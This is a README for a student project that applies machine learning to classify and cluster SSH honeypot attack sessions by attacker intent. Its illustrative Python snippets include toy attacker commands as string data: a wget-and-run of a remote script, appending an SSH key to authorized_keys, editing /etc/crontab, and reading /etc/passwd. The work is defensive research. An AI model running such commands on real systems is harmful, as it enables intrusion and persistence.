SSH Shell Attacks

Table of Contents

• Overview
• Dataset
• Project Report
• Project Structure
• Tools and Technologies
• How to Run the Project
• Detailed Documentation
     • Data Directory
     • Notebooks Directory
     • Results Directory
     • Scripts Directory
     • Tests Directory
• Authors
• License
• Acknowledgments

Last updated: January 2025

Overview

This project is part of the Machine Learning for Networking course at Politecnico di Torino. It focuses on analyzing SSH shell attack sessions recorded from honeypot deployments to classify attacker intents and explore underlying patterns.

Original Project Repository: ML4Net/SSH-Shell-Attacks
Original Report Repository: ML4Net/latex-report

Navigation Tip: This README provides a general overview of the project. For detailed documentation, check the specific README files in each directory (see Table of Contents above). Each subdirectory contains in-depth information about its specific components.

Quick Links:
- For data structure and preprocessing: Data Documentation
- For analysis notebooks: Notebooks Documentation
- For implementation details: Scripts Documentation

Objectives

Classification: Automatically identify and assign attacker intents (e.g., Persistence, Discovery) to each SSH attack session.
Clustering: Group similar attack sessions to uncover attack patterns and fine-grained categories.
Language Models: Explore advanced NLP techniques like BERT and Doc2Vec for improved classification performance.
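
As an illustration of the classification objective, here is a minimal sketch that assumes a session may carry several intents at once (a multi-label setup). The toy sessions, their labels, and the TF-IDF plus logistic regression combination are assumptions made for this example, not the project's actual pipeline or data.

```python
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.multiclass import OneVsRestClassifier
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import MultiLabelBinarizer

# Toy sessions and labels, invented for illustration only.
sessions = [
    "uname -a ; cat /proc/cpuinfo",
    "cat /etc/passwd ; whoami",
    "echo key >> ~/.ssh/authorized_keys",
    "crontab -l ; echo job >> /etc/crontab",
    "uname -a ; echo key >> ~/.ssh/authorized_keys",
]
intents = [
    ["Discovery"],
    ["Discovery"],
    ["Persistence"],
    ["Persistence"],
    ["Discovery", "Persistence"],
]

# Turn the label lists into a 0/1 indicator matrix, one column per intent.
binarizer = MultiLabelBinarizer()
y = binarizer.fit_transform(intents)

# Tokenize on whitespace and ';' so shell words stay intact,
# then train one binary classifier per intent.
model = make_pipeline(
    TfidfVectorizer(token_pattern=r"[^\s;]+"),
    OneVsRestClassifier(LogisticRegression(max_iter=1000)),
)
model.fit(sessions, y)

# Predict the intents of an unseen session and map them back to names.
predicted = model.predict(["whoami ; uname -a"])
print(binarizer.inverse_transform(predicted))
```

On so few samples the predicted intents are not meaningful; the sketch only shows how the pieces fit together.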

Dataset

The dataset consists of approximately 230,000 Unix shell attack sessions recorded from honeypots. It includes:

Session Commands: Malicious commands executed in an SSH session.
Timestamps: The exact time each attack started.
Labels: Pre-assigned intents based on the MITRE ATT&CK framework.
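
A minimal sketch of how data with these three fields could be inspected with pandas. The column names (`commands`, `timestamp`, `intents`) and the toy rows are assumptions made for this example. With the real data, one would presumably start from `pd.read_parquet("data/raw/ssh_attacks.parquet")` instead, which requires pyarrow.

```python
import pandas as pd

# Toy stand-in for the real dataset; rows and column names are hypothetical.
sessions = pd.DataFrame(
    {
        "commands": [
            "cat /proc/cpuinfo ; uname -a",
            "echo key >> ~/.ssh/authorized_keys",
            "wget http://example.com/x.sh ; sh x.sh",
        ],
        "timestamp": pd.to_datetime(
            ["2019-06-04 09:45:11", "2019-06-04 09:45:50", "2019-06-05 18:02:33"]
        ),
        "intents": [["Discovery"], ["Persistence"], ["Execution", "Discovery"]],
    }
)


def summarize(df: pd.DataFrame) -> dict:
    """Return the session count, the covered time span, and per-intent counts."""
    # explode() yields one row per (session, intent) pair before counting.
    intent_counts = df["intents"].explode().value_counts().to_dict()
    return {
        "n_sessions": len(df),
        "first": df["timestamp"].min(),
        "last": df["timestamp"].max(),
        "intent_counts": intent_counts,
    }


summary = summarize(sessions)
print(summary["n_sessions"], summary["intent_counts"])
```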

Intents (Classes)

The dataset uses 7 main intent classes:

Persistence
Discovery
Defense Evasion
Execution
Impact
Other (Miscellaneous intents)
Harmless (Non-malicious commands)
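
One way to feed these classes to a model is a multi-hot vector with one position per intent. The sketch below assumes a session can have more than one intent; the helper names `to_multi_hot` and `from_multi_hot` are hypothetical and do not come from the project's scripts.

```python
# The seven intent classes, in the order listed above.
INTENTS = [
    "Persistence",
    "Discovery",
    "Defense Evasion",
    "Execution",
    "Impact",
    "Other",
    "Harmless",
]


def to_multi_hot(labels):
    """Encode a collection of intent names as a 0/1 vector over INTENTS."""
    unknown = set(labels) - set(INTENTS)
    if unknown:
        raise ValueError(f"unknown intents: {sorted(unknown)}")
    return [1 if intent in labels else 0 for intent in INTENTS]


def from_multi_hot(vector):
    """Decode a 0/1 vector back into the list of intent names it marks."""
    return [intent for intent, flag in zip(INTENTS, vector) if flag]


print(to_multi_hot(["Discovery", "Execution"]))  # [0, 1, 0, 1, 0, 0, 0]
print(from_multi_hot([1, 0, 0, 0, 0, 0, 1]))     # ['Persistence', 'Harmless']
```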

Project Report

The project report is a comprehensive document detailing the methodologies, experiments, and findings of the SSH Shell Attacks project.

Format: PDF
Template: ACM format single column (acmlarge)

The report is named SSH-Shell-Attacks-report.pdf and can be found in the root directory of the repository.

An appendix, SSH-Shell-Attacks-appendix.pdf, contains extra plots and additional information. It is also in the root directory, in PDF format, and uses the same ACM single-column template.

The source of the report is in the ML4Net/latex-report repository.

Project Structure

SSH-Shell-Attacks/
│
├── data/                           # Dataset and related resources
│   ├── raw/                        # Original dataset files (e.g., ssh_attacks.parquet)
│   └── processed/                  # Pre-processed and feature-engineered files
│
├── notebooks/                      # Jupyter notebooks
│
├── scripts/                        # Python scripts for algorithms and utilities
│
├── results/                        # Outputs from the models and analysis
│   ├── figures/                    # Plots and visualizations
│   ├── models/                     # Saved models (e.g., .pkl, .h5)
│   └── metrics/                    # Evaluation metrics and reports
│
├── README.md                       # High-level overview of the project
├── SSH-Shell-Attacks-report.pdf    # Report of the project
├── SSH-Shell-Attacks-appendix.pdf  # Appendix of the report
├── requirements.txt                # Python dependencies
├── .gitignore                      # Ignore unnecessary files for versioning
└── LICENSE                         # MIT License text

Tools and Technologies

Programming Language: Python
Libraries:
- Data Processing: pandas, numpy, pyarrow
- Visualization: matplotlib, seaborn
- Machine Learning: scikit-learn
- Clustering: scikit-learn, wordcloud
- Language Models: scikit-learn, transformers, torch
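
As a rough illustration of how the scikit-learn pieces listed above could be combined for the clustering task, the sketch below groups a few toy sessions with TF-IDF features and k-means. The sessions, the tokenization pattern, and the choice of two clusters are assumptions made for this example, not the project's settings.

```python
from sklearn.cluster import KMeans
from sklearn.feature_extraction.text import TfidfVectorizer

# Toy sessions, invented for illustration: two system-inspection sessions
# and two download-and-prepare sessions.
sessions = [
    "uname -a ; cat /proc/cpuinfo",
    "uname -a ; cat /proc/cpuinfo ; whoami",
    "wget http://example.com/a.sh ; chmod +x a.sh",
    "wget http://example.com/b.sh ; chmod +x b.sh",
]

# Tokenize on whitespace and ';' so flags and paths remain single tokens.
vectorizer = TfidfVectorizer(token_pattern=r"[^\s;]+")
features = vectorizer.fit_transform(sessions)

# Fix random_state so repeated runs give the same assignment.
kmeans = KMeans(n_clusters=2, n_init=10, random_state=0)
labels = kmeans.fit_predict(features)

for label, session in zip(labels, sessions):
    print(label, session)
```

The cluster ids themselves are arbitrary; what matters is which sessions end up sharing an id.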

How to Run the Project

Clone the Repository:
```
git clone https://github.com/ML4Net/SSH-Shell-Attacks.git
cd SSH-Shell-Attacks
```
Install Dependencies:
```
pip install -r requirements.txt
```
Execute the Notebooks: Open the relevant notebook for each section and follow the instructions to:
- Load the dataset.
- Perform data exploration.
- Train and evaluate machine learning models.
Notebooks:
- section0_data_preprocessing_and_cleaning.ipynb
- section1_data_exploration_and_preprocessing.ipynb
- section2_supervised_learning_classification.ipynb
- section3_unsupervised_learning_clustering.ipynb
- section4_language_model_exploration.ipynb
Explore Scripts: Run modular scripts in the scripts/ directory for specific tasks like preprocessing or model training.

Authors

- Andrea Botticella
- Elia Innocenti
- Renato Mignone
- Simone Romano

License

This project is licensed under the MIT License - see the LICENSE file for details.

Acknowledgments

Luca Vassio: the professor supervising our work and the primary point of reference for the project.
Matteo Boffa: the creator and organizer of this project.
Team Members: Andrea Botticella, Elia Innocenti, Renato Mignone, and Simone Romano.

Please cite us if this project is copied, used for inspiration, or if any material is taken from it.
